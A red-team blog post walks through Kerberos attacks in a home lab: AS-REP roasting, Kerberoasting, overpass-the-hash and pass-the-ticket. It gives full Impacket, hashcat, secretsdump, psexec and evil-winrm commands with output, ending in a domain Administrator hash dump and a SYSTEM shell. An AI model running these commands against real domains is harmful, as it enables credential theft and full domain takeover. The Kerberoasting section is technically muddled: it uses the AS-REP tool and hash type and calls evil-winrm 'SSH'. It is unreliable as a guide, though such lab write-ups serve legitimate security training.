In the previous blog, “Attacking Kerberos Part 1,” we discussed the fundamental concepts of how Kerberos operates. This blog will delve into potential attacks that a red teamer can execute in an environment where Kerberos is in use. Let’s get started.
Lab Setup: Windows Server 2019 (IP: 10.0.6.4) and Kali Linux (IP: 10.0.6.8). Both the VM are running on Vritual box and the attacking machine Kali VM is not joined to the domain.
ASREPROAST Attack
In a previous blog post, I discussed the ASREPROAST attack. This attack targets users in an environment who have the ‘DONT_REQ_PREAUTH’ flag enabled, meaning they don’t require pre-authentication. When pre-authentication is disabled for a user, adversaries can impersonate that user by sending a KRB_AS_REQ request and obtaining a KRB_AS_REP from the KDC. To perform this attack, We’ll use Impacket’s GetNPUsers.py script, in combination with a username.txt file that contains a list of potential usernames to gather KRB_AS_REP messages from users with pre-authentication disabled.
# python GetNPUsers.py VANDAN-DC/ -dc-ip 10.0.6.4 -no-pass -usersfile userfile.txt -outputfile hashes.asreproast
Impacket v0.12.0.dev1+20231010.211240.56747803 - Copyright 2023 Fortra
$krb5asrep$23$krb_one@VANDAN-DC:a108da734affb767e465cc5058f0b9d5$df348f35987e08019e020419a15c2cd0efa6fe947abcfef5d965be7f435c7eb269391ae9d66aaf259c89ef441b7e6639411a75a176b863223f3b8a4c20a17e9baf9207eccd702ab59c67ff04cd600bd5429980aa70f51e9af0c483db90dd6d5fcf269c8f30f85b9e4bf56fafac959988753886d69cb7f3bbc14f580a9a33f05f5e67974b607c30eedd3dcacd7c651f5e1205c682ebfa087af25960352f9055e3707c1a2422855c76ee94b4753bb122aa3d338a46b27ab55a8af1ae6006d867e6261a05fb025dc4b21a0a0140da079c3df04e1f2df1493ac89f909a829982a8a8dede9a463778f1
Now that we have the KRB_AS_REP, we can try to figure out the password for the user krb_one. We’ll do this offline using a tool like hashcat.
# hashcat -m 18200 --force -a 0 hashes.asreproast rockyou.txt
hashcat (v6.2.6) starting
$krb5asrep$23$krb_one@VANDAN-DC:a108da734affb767e465cc5058f0b9d5$df348f35987e08019e020419a15c2cd0efa6fe947abcfef5d965be7f435c7eb269391ae9d66aaf259c89ef441b7e6639411a75a176b863223f3b8a4c20a17e9baf9207eccd702ab59c67ff04cd600bd5429980aa70f51e9af0c483db90dd6d5fcf269c8f30f85b9e4bf56fafac959988753886d69cb7f3bbc14f580a9a33f05f5e67974b607c30eedd3dcacd7c651f5e1205c682ebfa087af25960352f9055e3707c1a2422855c76ee94b4753bb122aa3d338a46b27ab55a8af1ae6006d867e6261a05fb025dc4b21a0a0140da079c3df04e1f2df1493ac89f909a829982a8a8dede9a463778f1:P***********3
Sometimes, the password you’re trying to crack might not be in the dictionary you’re using. It’s a matter of luck. However, in my opinion, if you find a username, you can try doing some online research (OSINT) on that username. In certain cases, some business applications use unique usernames, and their default passwords might not be in the dictionary you’re using for offline password cracking.
Kerberoasting
In the ASREPROAST attack, we found a user who had pre-authentication disabled, obtained their Ticket Granting Ticket (TGT), and later cracked their password offline. Kerberoasting, on the other hand, operates differently. It requires a domain account with no special privileges. In a Kerberoasting attack, the goal is to obtain the Ticket Granting Service (TGS) for a service associated with a domain user account (not a machine user). To execute this attack, we’ll use Impacket’s GetNPUsers.py script) and a low-privilege domain account. Our target for this Kerberoasting attack is a Windows Server 2019 and Kali will be our attacking machine.
# python GetNPUsers.py vandan.lab/win10_minor_user:P@ssword123 -outputfile hashes.asreproast
Impacket v0.12.0.dev1+20231010.211240.56747803 - Copyright 2023 Fortra
Name MemberOf PasswordLastSet LastLogon UAC
-------------- -------- -------------------------- -------------------------- --------
kerb_vuln_user 2023-09-28 01:51:24.451353 2023-10-18 00:50:46.149091 0x410200
krb_one 2023-10-18 00:54:44.915418 2023-10-18 00:50:46.152677 0x410200
$krb5asrep$23$kerb_vuln_user@VANDAN.LAB:14cca56ec4ea662f102c084da901221c$c4e83795b523b632738efc8926d49bc5c59aeb4b5b7aa1b59423def25a0b5a4e841519bcb991015ee7a09106c2dcb130122c3675317d3cc41b36ac626ed35caef6738e8ee7b5bda0d4249cd7f49b2b8f5a1bef419ef789c0f308dedeeca4c3c72c4203cc4e6309c084b6bfb214081bf9648131d30bbbefbff5bda69d557af79218c41a192c75f22cd8d99b4ed41dfe9f8416ef11a3deebf318fad6325be5054c7b9c87391619899891c9b1f9791e05ee720bfb4e31338d4ca8b7d22935981c94b5b8652c256eb9c1658bbeb3542464e69c45ed12b70d8c4bb677d01f4cca06d6ed6154cb6085c500
$krb5asrep$23$krb_one@VANDAN.LAB:c112dc6a5a7a547577a397e156b0944a$ba3b025bf162b2613f0697d4ce9b23a653bdf03208de6a0c424246513b7ed0e52ef6d1ff6dd55e8b52b5529d98c50c2333ec7d6a60422d1fe94bb6186c7f7411476126e6679e3be002513e4ba3d20cc81027c6d83a107f25b803af6e21457e47c003500709f8cf97c668b02013b1889c9f456fc912c37ec1196ccff18ae8b9025f61767c2f0703e66d5b7cbc6ebd51f54011df98b0424ab2a669be55a41eb971185e8dad8fb350b8cf6e94d3c1198906ec13939420fe739103fb26ce1ae697a30339cb855831fae34b22c57cc847873e5bebd1ca6c23ac1da2dfb510eb1572e2c15b35b6798db573
Next, you can attempt to crack the password by using an offline dictionary attack. Notice the Impacket command, which includes valid low privilege domain credentials that allowed us to obtain the Ticket Granting Service (TGS) for the krb_one user account. In the code snippet that follows, we successfully cracked the password offline. Following the crack, we were able to SSH into our domain using evil-winrm.
# hashcat -m 18200 --force -a 0 hashes.asreproast rockyou.txt
hashcat (v6.2.6) starting
$krb5asrep$23$krb_one@VANDAN.LAB:cfe451dcd56cdd169c0e8d7608ae8c33$e2bfc027b5c9abd8ff143bfdea5f36f2231ebdc0d33fdec5db0a4f0cbe86eb3078bdeccdf05b87217a7324c71b6a64e12167342635eab441743f1a411ab2451f8721e3c139e21f7c828e30a5ff92517a7a53d4e1a97fda3524d8dae788f26d3a533ebf6577d6b06cb906a566e16201a7dd3a7c6e64245da8ecd4ab1608df4d0785f9f7710ee9052f850f45fbe4f9027bee0d07bb8f864b7aaa6ca87dddf886098bc24e8073cd0d6f332244b9df96bd640a561f3ee1c553cb53dd6cf887d4c77033b9b3e5d4b9d64bafbb3875af7d32cabdb5c09e17f56268c469d90eb910c639c702768a26455f7c:K**********3
# evil-winrm -i 10.0.6.4 -u krb_one -p K****************3
*Evil-WinRM* PS C:\Users\krb_one\Documents> whoami
vandan-dc\krb_one
*Evil-WinRM* PS C:\Users\krb_one\Documents>
Overpass The Hash aka Pass The Key
In the ASREPROAST Attack, we saw how an adversaries can take advantage of the the user with pre-authentication disabled and send KRB_AP_REQ to the server and received KRB_AP_REP. Follownig to that we also looked at Kerberoasting attack where an adversaries would need at least one valid low priviledge domain credentials to request a Ticket Granting Ticket (TGT) for another users. Overpass The Hash or Pass The Key attack works in a different way. Here, adversaries would not have credentials but a hash would be used to request a TGT for another user. To successfully carry out this attack, an adversaries would need user’s NTLM hash.
# python secretsdump.py vandan.lab/krb_one@10.0.6.4 -just-dc-user Administrator -just-dc-ntlm
Impacket v0.12.0.dev1+20231010.211240.56747803 - Copyright 2023 Fortra
Password: <KRB_ONE_USER_PASSWORD_GOES_HERE>
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b43*******3b435b51404ee:cb8a4283854**************10d60f5dc:::
[*] Cleaning up...
In the above code snap, we were able to obtained the NTLM hash for the Administrator User and now we’re going to obtained the Ticket Granting Ticket (TGT) for the Administrator User.
# python getTGT.py vandan.lab/Administrator -hashes aad3b**********ee:cb8a428385*******************6793010d60f5dc
Impacket v0.12.0.dev1+20231010.211240.56747803 - Copyright 2023 Fortra
[*] Saving ticket in Administrator.ccache
Since, we have the NTLM hash, we can try cracking the hash using hashcat. In the following code snap, I was able to cracked the NTLM hash for the Administrator User.
# hashcat -m 1000 ntlm rockyou.txt
hashcat (v6.2.6) starting
cb8a428385459087a76793010d60f5dc:P**************3
Alternatively, we can use the hash to get the shell for the user. In my case, I obtained the hash for the Administrator user so I was able to obtained the System Shell however, In the real world scenario, an adversaries will get the user shell.
# python psexec.py -hashes aad*****************404ee:cb8a42******************10d60f5dc Administrator@10.0.6.4 cmd.exe
Impacket v0.12.0.dev1+20231010.211240.56747803 - Copyright 2023 Fortra
[*] Requesting shares on 10.0.6.4.....
[*] Found writable share ADMIN$
[*] Uploading file uEXQzdCv.exe
[*] Opening SVCManager on 10.0.6.4.....
[*] Creating service hNcs on 10.0.6.4.....
[*] Starting service hNcs.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Pass The Ticket Attack
Pass The Ticket is a method for obtaining another user’s Ticket Granting Ticket (TGT) in Kerberos. To utilize this ticket, an adversary would also require a session key. One way to obtain the TGT is through a Man-In-The-Middle (MiTM) attack as Kerberos communication occurs over TCP or UDP. However, this method doesn’t provide the session keys. To obtain both the session keys and the ticket from the lsass process memory, tools like Mimikatz can be used.
With Mimikatz, it becomes possible to execute a Pass The Ticket attack and obtain a ticket from the NTLM hash. In a Windows environment, “Pass The Key” refers to providing the user’s NTLM hash of their password rather than the actual password.
In a Pass The Ticket attack, instead of using the NTLM hash to request the tickets, the ticket itself is stolen to authenticate as its owner. It’s worth noting that Windows and Linux store these tickets differently.
In Linux, the tickets are stored in Credentials Caches, also known as ccache. Adversaries can find the tickets in three interesting locations:
- Tickets are stored in the /tmp directory with filenames like krb5cc.%uid.
- Kernel Keyring, a special memory place in the Linux kernel designed for storing keys.
- Process Memory when a single process needs to access the ticket.
My attacking VM is not connected to the domain, I’m unable to demonstrate the file structure of the /tmp/ directory containing the Kerberos tickets. However, Adversaries can obtained these tickets and perform pass the ticket attack.
Credits where its due
- MS-KILE: https://learn.microsoft.com/en-us/openspecs/windows-protocols/ms-kile/2a32282e-dd48-4ad9-a542-6098b02cc9
- Impacket: https://github.com/SecureAuthCorp/impacket
- MIT Kerberos Credential Thievery Research Paper: https://rp.os3.nl/2016-2017/p97/report.pdf